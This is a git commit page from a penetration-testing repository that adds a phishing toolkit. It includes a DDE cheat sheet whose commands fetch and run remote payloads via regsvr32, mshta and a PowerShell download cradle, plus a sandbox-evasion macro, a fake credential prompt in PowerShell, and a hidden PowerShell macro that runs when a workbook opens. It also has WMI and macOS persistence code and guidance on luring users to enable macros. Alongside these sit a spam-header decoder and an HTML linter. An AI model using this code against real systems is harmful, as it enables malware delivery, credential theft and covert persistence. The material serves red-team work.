Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2025-09-02 18:18:34 +02:00
Code Issues Packages Projects Releases Wiki Activity

Added phishing directory.

Browse Source
This commit is contained in:
mgeeky
2021-10-17 15:22:05 +02:00
parent 522a826ecb
commit e104ba2539
21 changed files with 2749 additions and 45 deletions
Download Patch File Download Diff File Expand all files Collapse all files

28
phishing/Macro-Less-Cheatsheet.md Normal file
View File

@ -0,0 +1,28 @@
## Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet
- Using `regsvr32` _*.sct_ files technique:
```
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
```
- Using `HTA` files technique:
```
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"
```
- Method from Empire - unfortunately unable to hide 'powershell.exe -NoP -sta -NonI' sequence
```
DDEAUTO C:\\Microsoft\\Programs\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://192.168.56.101/default.ps1');powershell -noP -sta -w 1 -enc $e "
```
- CactusTorch DDE can also generate files in **JS** and **VBS** formats.
They will utilize `cscript` as a file interpreter.
- Another option is to use scripts by _Dominic Spinosa_ found [here](https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads)
- Another option is to stick with `Unicorn` by _Dave Kennedy_
## Sources
- https://medium.com/red-team/dde-payloads-16629f4a2fcd

139
phishing/MacroDetectSandbox.vbs Normal file
View File

@ -0,0 +1,139 @@
Private Declare PtrSafe Function isDbgPresent Lib "kernel32" Alias "IsDebuggerPresent" () As Boolean
Public Function IsFileNameNotAsHexes() As Boolean
Dim str As String
Dim hexes As Variant
Dim only_hexes As Boolean
only_hexes = True
hexes = Array("0", "1", "2", "3", "4", "5", "6", "7", _
"8", "9", "a", "b", "c", "d", "e", "f")
str = ActiveDocument.name
str = Mid(str, 1, InStrRev(str, ".") - 1)
For i = 1 To UBound(hexes, 1) - 1
Dim ch As String
ch = LCase(Mid(str, i, 1))
If Not (UBound(Filter(hexes, ch)) > -1) Then
' Character not in hexes array.
only_hexes = False
Exit For
End If
Next
only_hexes = (Not only_hexes)
IsFileNameNotAsHexes = only_hexes
End Function
Public Function IsProcessListReliable() As Boolean
Dim objWMIService, objProcess, colProcess
Dim strComputer, strList
Dim bannedProcesses As Variant
bannedProcesses = Array("fiddler", "vxstream", _
"tcpview", "vmware", "procexp", "vmtools", "autoit", _
"wireshark", "procmon", "idaq", "autoruns", "apatedns", _
"windbg")
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colProcess = objWMIService.ExecQuery _
("Select * from Win32_Process")
For Each objProcess In colProcess
For Each proc In bannedProcesses
If InStr(LCase(objProcess.name), LCase(proc)) <> 0 Then
' Found banned process.
IsProcessListReliable = False
Exit Function
End If
Next
Next
If isDbgPresent() Then
IsProcessListReliable = False
Exit Function
End If
IsProcessListReliable = (colProcess.Count() > 50)
End Function
Public Function IsHardwareReliable() As Boolean
Dim objWMIService, objItem, colItems, strComputer
Dim totalSize, totalMemory, cpusNum As Integer
totalSize = 0
totalMemory = 0
cpusNum = 0
Const wbemFlagReturnImmediately = &H10
Const wbemFlagForwardOnly = &H20
strComputer = "."
' Checking total HDD size
Set objWMIService = GetObject _
("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_LogicalDisk")
For Each objItem In colItems
Dim num
num = Int(objItem.Size / 1073741824)
If num > 0 Then
totalSize = totalSize + num
End If
Next
If totalSize < 60 Then
' Total HDD size of the machine must be at least 60GB
IsHardwareReliable = False
Exit Function
End If
' Checking Memory
Set colComputer = objWMIService.ExecQuery _
("Select * from Win32_ComputerSystem")
For Each objComputer In colComputer
totalMemory = totalMemory + Int((objComputer.TotalPhysicalMemory) / 1048576) + 1
Next
If totalMemory < 1024 Then
' Total Memory is less than 1GB
IsHardwareReliable = False
Exit Function
End If
Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_Processor", "WQL", _
wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem In colItems2
cpusNum = cpusNum + objItem.NumberOfLogicalProcessors
Next
If cpusNum < 2 Then
' Nowadays everyone has at least 2 logical cores.
IsHardwareReliable = False
Exit Function
End If
IsHardwareReliable = True
End Function
Public Function IsRunningInSandbox() As Boolean
Dim test As Boolean
If IsFileNameNotAsHexes() <> True Then
IsRunningInSandbox = True
Exit Function
ElseIf IsProcessListReliable() <> True Then
IsRunningInSandbox = True
Exit Function
ElseIf IsHardwareReliable() <> True Then
IsRunningInSandbox = True
Exit Function
End If
IsRunningInSandbox = False
End Function

24
phishing/Phish-Creds.ps1 Normal file
View File

@ -0,0 +1,24 @@
<#
try {
(Get-Credential -Credential $null).GetNetworkCredential() |
Select-Object @{name="User"; expression = {
If ($_.Domain -ne [string]::Empty) {
"{0}\{1}" -f ($_.Domain), ($_.UserName)
} Else {
$_.UserName
}
}
}, Password | Format-List
} catch {
}
One can additionally add, right after Get-Credential following parameters that could improve
pretext's quality during social engineering attempt:
-Credential domain\username - when we know our victim's domain and/or username - we can supply this info to the dialog
-Message "Some luring sentence" - to include some luring message
#>
try { ((Get-Credential -Credential $null).GetNetworkCredential() | Select-Object @{name="User"; expression={If ($_.Domain -ne [string]::Empty) {"{0}\{1}" -f ($_.Domain), ($_.UserName)} Else { $_.UserName} }}, Password | Format-List) } catch { }

1
phishing/PhishingPost Submodule

Submodule phishing/PhishingPost added at bbb1add733

297
phishing/README.md Normal file
View File

@ -0,0 +1,297 @@
## Phishing and Social-Engineering related scripts, tools and CheatSheets
- **`decode-spam-headers.py`** - This tool accepts on input an `*.EML` or `*.txt` file with all the SMTP headers. It will then extract a subset of interesting headers and will attempt to parse them.
This script also extracts all IPv4 addresses and domain names and performs full DNS resolution of them.
Resulting output will contain useful information on why this e-mail might have been blocked.
Processed headers:
- `Authentication-Results`
- `From`
- `Received-SPF`
- `Received`
- `To`
- `X-Forefront-Antispam-Report`
- `X-Mailer`
- `X-Microsoft-Antispam-Mailbox-Delivery`
- `X-Microsoft-Antispam-Message-Info`
- `X-Microsoft-Antispam`
- `X-MS-Exchange-Transport-EndToEndLatency`
- `X-MS-Oob-TLC-OOBClassifiers`
- `X-MS-Exchange-AtpMessageProperties`
- `X-Exchange-Antispam-Report-CFA-Test`
- `X-Microsoft-Antispam-Report-CFA-Test`
- `X-MS-Exchange-AtpMessageProperties`
- `X-Spam-Status`
- `X-Spam-Level`
- `X-Spam-Flag`
- `X-Spam-Report`
- and more...
Most of these headers are not fully documented, therefore the script is unable to pinpoint all the details, but at least it collects all I could find on them.
Sample run:
```
PS> py decode-spam-headers.py headers.txt
------------------------------------------
(1) Test: Received - Mail Servers Flow
HEADER:
Received
VALUE:
...
ANALYSIS:
- List of server hops used to deliver message:
--> (1) "attacker" <attacker@attacker.com>
|_> (2) ec2-11-22-33-44.eu-west-3.compute.amazonaws.com. (11.22.33.44)
time: 01 Jan 2021 12:34:18
|_> (3) mail-wr1-f51.google.com (209.85.221.51)
time: 01 Jan 2021 12:34:20
version: fuzzy match: Exchange Server 2019 CU11; October 12, 2021; 15.2.986.9
|_> (4) SN1NAM02FT0061.eop-nam02.prod.protection.outlook.com (2603:10b6:806:131:cafe::e5)
time: 01 Jan 2021 12:34:20
version: fuzzy match: Exchange Server 2019 CU11; October 12, 2021; 15.2.986.9
|_> (5) SA0PR11CA0138.namprd11.prod.outlook.com (2603:10b6:806:131::23)
time: 01 Jan 2021 12:34:20
version: fuzzy match: Exchange Server 2019 CU11; October 12, 2021; 15.2.986.9
|_> (6) CP2PR80MB4114.lamprd80.prod.outlook.com (2603:10d6:102:3c::15)
time: 01 Jan 2021 12:34:23
|_> (7) "Victim Surname" <victim@contoso.com>
------------------------------------------
[...]
------------------------------------------
(4) Test: Mail Client Version
HEADER:
X-Mailer
VALUE:
OEM
ANALYSIS:
- X-Mailer header was present and contained value: "OEM".
------------------------------------------
(5) Test: X-Forefront-Antispam-Report
HEADER:
X-Forefront-Antispam-Report
VALUE:
CIP:209.85.221.51;CTRY:US;LANG:de;SCL:5;SRV:;IPV:NLI;SFV:SPM;H:mail-wr1-f51.google.com;PTR:mail-wr1
-f51.google.com;CAT:SPM;SFS:(4636009)(6916009)(1096003)(6666004)(4744005)(19625305002)(58800400
005)(166002)(336012)(356005)(55446002)(5660300002)(956004)(121216002)(7596003)(7636003)(9686003
)(86362001)(224303003)(26005)(35100500006)(43540500002);DIR:INB;
ANALYSIS:
- CIP: Connecting IP address: 209.85.221.51
- CTRY: The source country as determined by the connecting IP address
- US
- LANG: The language in which the message was written
- de
- IPV: Ingress Peer Verification status
- NLI: The IP address was not found on any IP reputation list.
- SFV: Message Filtering
- SPM: The message was marked as spam by spam filtering.
- H: The HELO or EHLO string of the connecting email server.
- mail-wr1-f51.google.com
- PTR: Reverse DNS of the Connecting IP peer's address
- mail-wr1-f51.google.com
- CAT: The category of protection policy
- SPM: Spam
- DIR: Direction of email verification
- INB: Inbound email verification
- Message matched 23 Anti-Spam rules:
- (1096003)
- (121216002)
- (166002)
- (19625305002)
- (224303003)
- (26005)
- (336012)
- (35100500006) - (SPAM) Message contained embedded image.
- (356005)
- (43540500002)
- (4636009)
- (4744005)
- (55446002)
- (5660300002)
- (58800400005)
- (6666004)
- (6916009)
- (7596003)
- (7636003)
- (86362001)
- (956004)
- (9686003)
- SCL: Spam Confidence Level: 5
- SPAM: Spam filtering marked the message as Spam
More information:
- https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spam-message-headers
- https://docs.microsoft.com/en-us/exchange/antispam-and-antimalware/antispam-protection/antispam-stamps
- https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/spam-confidence-levels
- https://docs.microsoft.com/en-us/exchange/monitoring/trace-an-email-message/run-a-message-trace-and-view-results
------------------------------------------
(6) Test: X-Microsoft-Antispam-Mailbox-Delivery
HEADER:
X-Microsoft-Antispam-Mailbox-Delivery
VALUE:
ucf:0;jmr:1;auth:0;dest:J;ENG:(910001)(944506458)(944626604)(750132)(520011016);
ANALYSIS:
- This header denotes what to do with received message, where to put it.
- auth: Message originating from Authenticated sender
- 0: Not Authenticated
- dest: Destination where message should be placed
- J: JUNK directory
- Message matched 6 Anti-Spam Delivery rules:
- (520011016)
- (750132)
- (910001)
- (944506458)
- (944626604)
------------------------------------------
(7) Test: X-Microsoft-Antispam Bulk Mail
HEADER:
X-Microsoft-Antispam
VALUE:
BCL:0;
ANALYSIS:
- BCL: BULK Confidence Level: 0
The message isn't from a bulk sender.
More information:
- https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/bulk-complaint-level-values
------------------------------------------
[...]
------------------------------------------
(10) Test: MS Defender ATP Message Properties
HEADER:
X-MS-Exchange-AtpMessageProperties
VALUE:
SA|SL
ANALYSIS:
- MS Defender Advanced Threat Protection enabled following protections on this message:
- Safe Attachments Protection
- Safe Links Protection
------------------------------------------
(11) Test: Domain Impersonation
HEADER:
From
VALUE:
"attacker" <attacker@attacker.com>
ANALYSIS:
- Mail From: <attacker@attacker.com>
- Mail Domain: attacker.com
--> resolves to: 11.22.33.44
--> reverse-DNS resolves to: ec2-11-22-33-44.eu-west-3.compute.amazonaws.com
(sender's domain: amazonaws.com)
- First Hop: SMTP-SERVICE (44.55.66.77)
--> resolves to:
--> reverse-DNS resolves to: host44-55-66-77.static.arubacloud.pl
(first hop's domain: arubacloud.pl)
- Domain SPF: "v=spf1 include:_spf.google.com ~all"
- WARNING! Potential Domain Impersonation!
- Mail's domain should resolve to: amazonaws.com
- But instead first hop resolved to: arubacloud.pl
```
- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c))
- **`gophish-send-mail`** - This script will connect to your GoPhish instance, adjust HTML template and will send a quick test e-mail wherever you told it to, in attempt to let you quickly test out your HTML code.
- **`MacroDetectSandbox.vbs`** - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))
- **`Macro-Less-Cheatsheet.md`** - Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet ([gist](https://gist.github.com/mgeeky/981213b4c73093706fc2446deaa5f0c5))
- **`macro-psh-stdin-author.vbs`** - VBS Social Engineering Macro with Powershell invocation taking arguments from Author property and feeding them to StdIn. ([gist](https://gist.github.com/mgeeky/50c4b7fa22d930a80247fea62755fbd3))
- **`Phish-Creds.ps1`** - Powershell oneline Credentials Phisher - to be used in malicious Word Macros/VBA/HTA or other RCE commands on seized machine. ([gist](https://gist.github.com/mgeeky/a404d7f23c85954650d686bb3f02abaf))
One can additionally add, right after `Get-Credential` following parameters that could improve pretext's quality during social engineering attempt:
- `-Credential domain\username` - when we know our victim's domain and/or username - we can supply this info to the dialog
- `-Message "Some luring sentence"` - to include some luring message
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
- **`phishing-HTML-linter.py`** - This script will help you identify issues with your HTML code that you wish to use as your Phishing template.
It looks for things such as:
- Embedded images
- Images with lacking `ALT=""` attribute
- Anchors trying to masquerade links
Such characteristics are known bad smells that will let your e-mail blocked.
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
- **`warnings\EN-Word.docx`** and **`warnings\EN-Excel.docx`** - Set of ready-to-use Microsoft Office Word shapes that can be pasted / inserted into malicious documents for enticing user into clicking "Enable Editing" and "Enable Content" buttons.
- **`WMIPersistence.vbs`** - Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up. ([gist](https://gist.github.com/mgeeky/d00ba855d2af73fd8d7446df0f64c25a))
- **`Various-Macro-Based-RCEs.md`** - Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))
- **`vba-macro-mac-persistence.vbs`** - (WIP) Working on VBA-based MacPersistance functionality for MS Office for Mac Macros. ([gist](https://gist.github.com/mgeeky/dd184e7f50dfab5ac97b4855f23952bc))
- **`vba-windows-persistence.vbs`** - VBA Script implementing two windows persistence methods - via WMI EventFilter object and via simple Registry Run. ([gist](https://gist.github.com/mgeeky/07ffbd9dbb64c80afe05fb45a0f66f81))
- [**`VisualBasicObfuscator`**](https://github.com/mgeeky/VisualBasicObfuscator) - Visual Basic Code universal Obfuscator intended to be used during penetration testing assignments.

1
phishing/RobustPentestMacro Submodule

Submodule phishing/RobustPentestMacro added at 32992adea5

1169
phishing/Various-Macro-Based-RCEs.md Normal file
View File

File diff suppressed because it is too large Load Diff

1
phishing/VisualBasicObfuscator Submodule

Submodule phishing/VisualBasicObfuscator added at 80e7515ed6

77
phishing/WMIPersistence.vbs Normal file
View File

@ -0,0 +1,77 @@
'
' SYNOPSIS:
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'
' USAGE:
' WMIPersistence("command to be launched", "taskName")
'
' EXAMPLE:
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
Dim filterName, consumerName As String
Dim objLocator, objService1
Dim objInstances1, objInstances2, objInstances3
Dim newObj1, newObj2, newObj3
On Error GoTo Failed
filterName = taskName & "Event"
consumerName = taskName & "Consumer"
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService1 = objLocator.ConnectServer(".", "root\subscription")
'
' Step 1: Set WMI Instance of type Event Filter
'
Set objInstances1 = objService1.Get("__EventFilter")
' The malware originally will kicks in after roughly 3 minutes since System gets up.
' One can modify this delay time by modifying the WHERE clausule of the below query.
query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _
& "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _
& "AND TargetInstance.SystemUpTime >= 200 AND " _
& "TargetInstance.SystemUpTime < 320"
' New object of type __EventFilter
Set newObj1 = objInstances1.Spawninstance_
newObj1.name = filterName
newObj1.eventNamespace = "root\cimv2"
newObj1.QueryLanguage = "WQL"
newObj1.query = query
newObj1.Put_
'
' Step 2: Set WMI instance of type: CommandLineEventConsumer
'
Set objInstances2 = objService1.Get("CommandLineEventConsumer")
Set newObj2 = objInstances2.Spawninstance_
newObj2.name = consumerName
newObj2.CommandLineTemplate = exePath
newObj2.Put_
'
' Step 3: Set WMI instance of type: Filter To Consumer Binding
'
Set objInstances3 = objService1.Get("__FilterToConsumerBinding")
Set newObj3 = objInstances3.Spawninstance_
newObj3.Filter = "__EventFilter.Name=""" & filterName & """"
newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """"
newObj3.Put_
WMIPersistence = True
Exit Function
Failed:
WMIPersistence = False
End Function

1958
phishing/decode-spam-headers.py Normal file
View File

File diff suppressed because it is too large Load Diff

56
phishing/gophish-send-mail/README.md Normal file
View File

@ -0,0 +1,56 @@
## `gophish-send-mail.py`
This script will connect to your GoPhish instance, adjust HTML template and will send a quick test e-mail wherever you told it to, in attempt to let you quickly test out your HTML code.
1. Firstly you need to come up with YAML configuration file:
These are required parameters:
```
gophish_addr: https://127.0.0.1:3100
token: 1b07b71b0ba50...API_KEY...efe720a1ab79
file: test.html
template_name: existing-template-name
sender: sender@attacker.com
recipient: recipient@contoso.com
```
These are optional parameters:
- `subject`
- `first_name`
- `last_name`
- `position`
- `url`
- `dont_restore`
2. Then prepare your HTML file with message you want to send.
3. And run it.
Sample run:
```
PS > py .\gophish-send-mail.py .\send-mail-with-gophish.yaml
:: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky
[+] Template to use:
ID: 22
Name: test-template-1
Subject: Click Here To Win
[.] Updating it...
[+] Template updated.
[.] Sending e-mail via Campaign -> Send Test Email...
From: sender@attacker.com
To: recipient@contoso.com
[+] Email Sent
[.] Restoring template...
[+] Finished.
```

8
phishing/gophish-send-mail/example-gophish-send-config.yaml Normal file
View File

@ -0,0 +1,8 @@
gophish_addr: https://127.0.0.1:3100
token: 1b07b71b0ba50...API_KEY...efe720a1ab79
file: test.html
template_name: existing-template-name
sender: sender@attacker.com
recipient: recipient@contoso.com

202
phishing/gophish-send-mail/gophish-send-mail.py Normal file
View File

@ -0,0 +1,202 @@
#!/usr/bin/python3
import os, sys, re
import string
import argparse
import yaml
import json
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
options = {
'gophish_addr': '',
'token' : '',
'file' : '',
'template_name' : '',
'subject': '',
'first_name': '',
'last_name': '',
'position': '',
'sender': '',
'recipient': '',
'url' : '',
'dont_restore' : False
}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',
'Authorization': '',
}
def get(url):
r = requests.get(
f"{options['gophish_addr']}" + url,
headers = headers,
verify = False
)
if r.status_code != 200:
print(f'[!] URL: {url} returned status code: {r.status_code}!')
print(r.json())
sys.exit(1)
return r.json()
def put(url, data):
r = requests.put(
f"{options['gophish_addr']}" + url,
headers = headers,
json = data,
verify = False
)
if r.status_code != 200:
print(f'[!] URL: {url} returned status code: {r.status_code}!')
print(r.json())
sys.exit(1)
return r.json()
def post(url, data):
r = requests.post(
f"{options['gophish_addr']}" + url,
headers = headers,
json = data,
verify = False
)
if r.status_code != 200:
print(f'[!] URL: {url} returned status code: {r.status_code}!')
print(r.json())
sys.exit(1)
return r.json()
def getTemplate():
out = get("/api/templates/?{}")
for obj in out:
if obj['name'] == options['template_name']:
return obj
print(f'[!] Could not find template named: "{options["template_name"]}"!')
sys.exit(1)
def updateTemplate(template, html):
obj = {}
obj.update(template)
obj['html'] = html
if len(options['subject']) > 0:
obj['subject'] = options['subject']
out = put(f'/api/templates/{template["id"]}', obj)
def sendEmail():
obj = {
"template":{
"name": options['template_name']
},
"first_name": options['first_name'],
"last_name": options['last_name'],
"email": options['recipient'],
"position": options['position'],
"url":options['url'],
"page": {
"name": ""
},
"smtp": {
"name": options['sender']
}
}
out = post('/api/util/send_test_email', obj)
if out['success']:
print('[+] ' + out['message'])
else:
print('[!] ' + out['message'])
def opts(argv):
global options
global headers
o = argparse.ArgumentParser(
usage = 'gophish-send-mail.py [options] <config.yaml>'
)
req = o.add_argument_group('Required arguments')
req.add_argument('config', help = 'YAML config file')
args = o.parse_args()
op = None
with open(args.config, encoding='utf-8') as f:
op = yaml.safe_load(f)
for k in (
'gophish_addr',
'token',
'file',
'template_name',
'recipient',
'sender'
):
if k not in op.keys():
print(f'[!] {k} not specified!')
sys.exit(1)
if op['gophish_addr'][-1] == '/':
op['gophish_addr'] = op['gophish_addr'][:-1]
headers['Authorization'] = f'Bearer {op["token"]}'
options.update(op)
return op
def main(argv):
args = opts(argv)
if not args:
return False
print('''
:: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky
''')
template = getTemplate()
print(f'''[+] Template to use:
ID: {template["id"]}
Name: {template["name"]}
Subject: {template["subject"]}
''')
print(f'[.] Updating it with file "{options["file"]}"...')
html = ''
with open(options['file'], 'rb') as f:
html = f.read()
updateTemplate(template, html.decode())
print('[+] Template updated.')
print(f'''[.] Sending e-mail via Campaign -> Send Test Email...
From: {options['sender']}
Recipient: {options['recipient']}
''')
sendEmail()
if not options['dont_restore']:
print('[.] Restoring template...')
updateTemplate(template, template['html'])
print('[+] Finished.')
if __name__ == '__main__':
main(sys.argv)

12
phishing/macro-psh-stdin-author.vbs Normal file
View File

@ -0,0 +1,12 @@
Private Sub Workbook_Open()
Dim author As String
author = ActiveWorkbook.BuiltinDocumentProperties("Author")
Dim ws As Object
Set ws = CreateObject("WScript.Shell")
With ws.Exec("powershell.exe -nop -WindowStyle hidden -Command -")
.StdIn.WriteLine author
.StdIn.WriteBlankLines 1
.Terminate
End With
End Sub

222
phishing/phishing-HTML-linter.py Normal file
View File

@ -0,0 +1,222 @@
#!/usr/bin/python3
import os, sys, re
import string
import argparse
import yaml
import json
from bs4 import BeautifulSoup
options = {
'format' : 'text',
}
class PhishingMailParser:
def __init__(self, options):
self.options = options
self.results = {}
def parse(self, html):
self.html = html
self.soup = BeautifulSoup(html, features="lxml")
self.results['Embedded Images'] = self.testEmbeddedImages()
self.results['Images without ALT'] = self.testImagesNoAlt()
self.results['Masqueraded Links'] = self.testMaskedLinks()
return {k: v for k, v in self.results.items() if v}
@staticmethod
def context(tag):
s = str(tag)
if len(s) < 100:
return s
beg = s[:50]
end = s[-50:]
return f'{beg}...{end}'
def testMaskedLinks(self):
links = self.soup('a')
desc = 'Links that masquerade their href= attribute by displaying different link are considered harmful and will increase Spam score.'
context = ''
result = ''
num = 0
embed = ''
for link in links:
try:
href = link['href']
except:
continue
text = link.getText()
url = re.compile(r'((http|https)\:\/\/)?[a-zA-Z0-9\.\/\?\:@\-_=#]+\.([a-zA-Z]){2,6}([a-zA-Z0-9\.\&\/\?\:@\-_=#])*')
m1 = url.match(href)
m2 = url.match(text)
if m1 and m2:
num += 1
context += '- ' + PhishingMailParser.context(link) + '\n'
context += f'\thref = "{href[:64]}"\n'
context += f'\ttext = "{text[:64]}"\n\n'
if num > 0:
result += f'- Found {num} <a> tags that masquerade their href="" links with text!\n'
result += '\t Links that try to hide underyling URL are harmful and will be considered as Spam!\n'
if len(result) == 0:
return []
return {
'description' : desc,
'context' : context,
'analysis' : result
}
def testImagesNoAlt(self):
images = self.soup('img')
desc = 'Images without ALT="value" attribute may increase Spam scorage.'
context = ''
result = ''
num = 0
embed = ''
for img in images:
src = img['src']
alt = ''
try:
alt = img['alt']
except:
pass
if alt == '':
num += 1
context += '- ' + PhishingMailParser.context(img) + '\n'
if num > 0:
result += f'- Found {num} <img> tags without ALT="value" attribute.\n'
result += '\t Images without alternate text set in their attribute may increase Spam score\n'
if len(result) == 0:
return []
return {
'description' : desc,
'context' : context,
'analysis' : result
}
def testEmbeddedImages(self):
images = self.soup('img')
desc = 'Embedded images can increase Spam Confidence Level (SCL) in Office365 by 4 points. Embedded images are those with <img src="data:image/png;base64,<BLOB>"/> . They should be avoided.'
context = ''
result = ''
num = 0
embed = ''
for img in images:
src = img['src']
alt = ''
try:
alt = img['alt']
except:
pass
if src.lower().startswith('data:image/'):
if len(embed) == 0:
embed = src[:30]
num += 1
if len(alt) > 0:
context += f'- ALT="{alt}": ' + PhishingMailParser.context(img) + '\n'
else:
context += '- ' + PhishingMailParser.context(img) + '\n'
if num > 0:
result += f'- Found {num} <img> tags with embedded image ({embed}).\n'
result += '\t Embedded images increase Office365 SCL (Spam) level by 4 points!\n'
if len(result) == 0:
return []
return {
'description' : desc,
'context' : context,
'analysis' : result
}
def printOutput(out):
if options['format'] == 'text':
width = 100
num = 0
for k, v in out.items():
num += 1
analysis = v['analysis']
context = v['context']
analysis = analysis.replace('- ', '\t- ')
print(f'''
------------------------------------------
({num}) Test: {k}
CONTEXT:
{context}
ANALYSIS:
{analysis}
''')
elif options['format'] == 'json':
print(json.dumps(out))
def opts(argv):
global options
global headers
o = argparse.ArgumentParser(
usage = 'phishing-HTML-linter.py [options] <file.html>'
)
req = o.add_argument_group('Required arguments')
req.add_argument('file', help = 'Input HTML file')
args = o.parse_args()
return args
def main(argv):
args = opts(argv)
if not args:
return False
print('''
:: Phishing HTML Linter
Shows you bad smells in your HTML code that will get your mails busted!
Mariusz B. / mgeeky
''')
html = ''
with open(args.file, 'rb') as f:
html = f.read()
p = PhishingMailParser({})
ret = p.parse(html.decode())
printOutput(ret)
if __name__ == '__main__':
main(sys.argv)

81
phishing/vba-macro-mac-persistence.vbs Normal file
View File

@ -0,0 +1,81 @@
#If VBA7 Then
' 64-bit Mac (2016)
Private Declare PtrSafe Function system Lib "libc.dylib" Alias "system" _
(ByVal command As String) As Long
Private Declare PtrSafe Function fopen Lib "libc.dylib" Alias "fopen" _
(ByVal file As String, ByVal mode As String) As LongPtr
Private Declare PtrSafe Function fputs Lib "libc.dylib" Alias "fputs" _
(ByVal str As String, ByVal file As LongPtr) As Long
Private Declare PtrSafe Function fclose Lib "libc.dylib" Alias "fclose" _
(ByVal file As LongPtr) As Long
#Else
' 32-bit Mac
Private Declare Function system Lib "libc.dylib" Alias "system" _
(ByVal command As String) As Long
Private Declare Function fopen Lib "libc.dylib" Alias "fopen" _
(ByVal file As String, ByVal mode As String) As Long
Private Declare Function fputs Lib "libc.dylib" Alias "fputs" _
(ByVal str As String, ByVal file As Long) As Long
Private Declare Function fclose Lib "libc.dylib" Alias "fclose" _
(ByVal file As Long) As Long
#End If
Sub writeToFile(ByVal file As String, ByVal txt As String)
#If Mac Then
#If VBA7 Then
Dim fp As LongPtr
#Else
Dim fp As Long
#End If
Dim grants
grants = Array(file)
GrantAccessToMultipleFiles(grants)
' BUG: fopen will return 0 here.
fp = fopen(file, "w")
If fp = 0 Then: Exit Sub
fputs txt, fp
fclose(fp)
#End If
End Sub
Sub MacPersistence(ByVal cmd As String, ByVal taskName As String)
Dim plist As String
plist = "<?xml version=""1.0"" encoding=""UTF-8""?>\n"
plist = plist & "<!DOCTYPE plist PUBLIC ""-//Apple Computer//DTD "
plist = plist & "PLIST 1.0//EN"" ""http://www.apple.com/DTDs/plist"
plist = plist & " = plist & PropertyList-1.0.dtd"">\n"
plist = plist & "<plist version=""1.0"">\n
plist = plist & "<dict>\n"
plist = plist & " <key>Label</key>\n"
plist = plist & " <string>" & taskName & "</string>\n"
plist = plist & " <key>ProgramArguments</key>\n"
plist = plist & " <array>\n"
plist = plist & " <string>/bin/bash</string>\n"
plist = plist & " <string>-c</string>\n"
plist = plist & " <string>'" & cmd & "'</string>\n"
plist = plist & " </array>\n"
plist = plist & " <key>RunAtLoad</key>\n"
plist = plist & " <true/>\n"
plist = plist & " <key>KeepAlive</key>\n"
plist = plist & " <true/>\n"
plist = plist & "</dict>\n"
plist = plist & "</plist>\n"
' TODO: File writing does not work at the moment, most likely due to
' apps sandboxing mechanism enforced by the system.
' Approach #1: File write by system command
' system("echo -e """ & plist & """ > ~/Library/LaunchAgents/" & taskName)
' Approach #2: File write by fopen+fputs+fclose
Dim fileName As String
fileName = "~/Library/LaunchAgents/" & taskName & ".plist"
writeToFile fileName, plist
End Sub
Sub TestMacPersistence()
MacPersistence "/Applications/Calculator.app/Contents/MacOS/Calculator", "com.java.update"
End Sub

105
